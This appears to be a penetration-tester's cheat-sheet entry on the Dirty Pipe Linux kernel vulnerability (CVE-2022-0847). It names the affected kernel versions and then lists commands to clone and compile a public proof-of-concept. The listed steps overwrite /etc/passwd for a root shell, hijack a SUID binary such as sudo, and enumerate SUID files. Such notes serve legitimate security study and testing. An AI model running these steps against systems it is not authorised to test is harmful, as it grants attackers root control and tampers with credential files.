Skip to content

Dirty Pipe

  • vulnerability in the Linux kernel, named Dirty Pipe (CVE-2022-0847),
    • allows a user to write to arbitrary files as long as he has read access to these files.
    • Android phones, apps run with user rights, so a malicious or compromised app could take over the phone.
    • similar to the Dirty Cow vulnerability discovered in 2016.
  • All kernels from version 5.8 to 5.17 are affected and vulnerable to this vulnerability.
  • uses pipes | for exploitation
  • we can edit the /etc/passwd file to remove the password and login without a password for any user
  • PoC - https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
    • git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
    • cd CVE-2022-0847-DirtyPipe-Exploits
    • bash compile.sh
    • will create 2 files - exploit-1 and exploit-2

For exploit-1

  • modifies the /etc/passwd and gives us a prompt with root privileges
  • verify kernel version
    • uname -r
  • exploit
    • ./exploit-1

For exploit-2

  • we can execute SUID binaries with root privs
  • find SUID binaries
    • find / -perm -4000 2>/dev/null
  • choose some binary with the full path
    • ./exploit-2 /usr/bin/sudo